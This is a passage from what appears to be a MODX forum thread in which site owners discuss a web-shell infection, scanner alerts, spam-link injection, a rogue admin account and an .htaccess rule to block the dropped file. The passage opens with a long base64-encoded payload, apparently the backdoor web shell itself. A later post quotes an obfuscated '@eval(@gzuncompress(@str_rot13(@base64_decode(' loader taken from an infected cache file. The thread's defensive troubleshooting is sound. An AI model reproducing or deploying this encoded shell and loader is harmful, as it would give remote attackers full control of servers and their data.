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"))));
            exit;
            


            Also found: /assets/start.php

            I couldn't view the contents of it or download it to my local machine as my virus protection software intercepted it, reporting that it contained "Backdoor:PHP/WebShell.A – a backdoor trojan that allows unauthorized access and control of an affected computer by a remote attacker."

            This one may not be related, but it had the same creation date as the other files.

              • 3749
              • 24,544 Posts
              I decoded the code in my editor and infected a localhost install. It appears quite sophisticated. It essentially produces a cPanel-like form that lets the hacker do just about anything with your machine.

              Here are a couple of screenshots. The pictures are in reverse order, the first one is the bottom and the second one is the top. Notice the PhpInfo link and the extensive top menu in the top one:

              https://plus.google.com/107373501469947148024/posts/GRMZLBJjPBr



                Did I help you? Buy me a beer
                Get my Book: MODX:The Official Guide
                MODX info for everyone: http://bobsguides.com/modx.html
                My MODX Extras
                Bob's Guides is now hosted at A2 MODX Hosting
                • 13373
                • 70 Posts
                Has there been any further progress with this?

                I'm getting constant alerts from my cxswatch script as follows:

                cxswatch Scanning /home/...xx.../public_html/core/cache/includes/elements/modplugin/4.include.cache.php:
                # Regular expression match = [decode regex: 1]:
                '/home/...xx.../public_html/core/cache/includes/elements/modplugin/4.include.cache.php'
                # (quarantined to /home/quarantine/cxsuser/......../4.include.cache.php.1404555481_1) (decoded file [depth: 1]) ClamAV detected virus = [PHP.Shell-38]:
                '/home/...xx.../public_html/core/cache/includes/elements/modplugin/4.include.cache.php'

                and:

                cxswatch Scanning /home/...xx.../public_html/core/cache/context_settings/web/context.cache.php:
                # Regular expression match = [decode regex: 1]:
                '/home/...xx.../public_html/core/cache/context_settings/web/context.cache.php'

                Looking at the quarantined 4.include.cache.php file shows the following code:

                @eval(@gzuncompress(@str_rot13(@base64_decode('a5zlfXtfGzfT6N/kRoitn67dGHCbpEIKmFgIJKQJpFxlg7zu2l7bW9ZeamqNoXa++5kZXUnaizGkfX/n/M5mCV52NBpWI3Y0MxqtrrLN7clj8sgNwyB5h+4kCHBiPCjvt2rfvKl5PPLGXjtl47Ld86KJ79y2CTCyqw3IfLS6TWWm8bA9ZKKItdio97R5NZp4FuSVuoEfhJB1/dDrP7U2Hi2VbWHfmfpk2+nGXjCGLPvA893orTO29ex25LadP5wbAIjDqat0aIdBCNRg0Q/euBfMopVT83YDij9N8vrlcmo0iWLLpfbp/sn7/ZML+9XZ2bv2OXy1al/uH53ZXyoV9vXR0kUJ6ghqB+44U7KdMGdhy9bLIBj4rkhy1qk/DSf44+3p0fMgxl+e02nC7tC7aVD8/OSMe+4N/jpkUx......


                I'm also getting the following code injected into a *few* pages, not all:

                <div style="top:-3400px;position:absolute;left:-3252px;"><a href="http://www.standrews.vic.edu.au/australian-pharmacy-viagra.html">australian pharmacy viagra</a> <a href="http://ame.fsu.edu/acheter-paroxetine-20mg.html">acheter paroxetine 20mg</a></div>


                I did find an extra user called support, which has been removed. I cannot see any other files like the modxresponse one mentioned earlier. This is happening on a 2.2.14 install. I've completely removed the core/cache folder, which has had no effect.
                  • 38357
                  • 178 Posts
                  Quote from: pepebe at Jun 26, 2014, 01:55 PM
                  Quote from: bobd72 at Jun 26, 2014, 01:14 PM
                  I have cleared core/cache completely and denied access to any re-occurrence of cache.php using .htaccess So far there has been no reinfection since the last one. I have no unknown users. I am continuing to monitor the site to see if reinfection occurs.
                  It is of interest that frankliveaux had this file in assets - mine was in public_html
                  If this is a zero-day exploit then it may go a long way further back than 2.2.14 ?

                  I'm not an htaccess expert. Mind sharing your rule to deny access to cache.php?

                  How about redirecting requests to */cache.php instead of denying it? Could be used to send you a wakeup call.

                  Regards,

                  pepebe
                  Apologies for the slow response. I'm no expert either but this is what I have used in the .htaccess file for the directory where the cache.php was inserted:
                  <Files "cache.php">
                  Order Allow,Deny
                  Deny from all
                  </Files>

                  Currently I have had no re-infection. I am still unable to find how it was injected as there are no unauthorised users, no evidence of incursion in the logs, I have strong passswords (now changed) and no-one but me has access to the backend (other than the server's admins of course).


                    • 10075
                    • 20 Posts
                    Thanks for that cache.php .htaccess code; I've added it to the htaccess files on my MODx sites and so far there's been no sign of a re-infection, knock on wood. I'm still totally baffled about how it occurred in the first place, though.
                    • If you had a site you upgraded to 2.2.14, it's possible attackers added a MODX user to your system before you were able to complete the upgrade, creating a backdoor for them to access your manager and essentially do anything they want with your site at a future point in time. I've seen several instances of this now; it is worth it to make sure you do not have any unexpected user accounts in your install.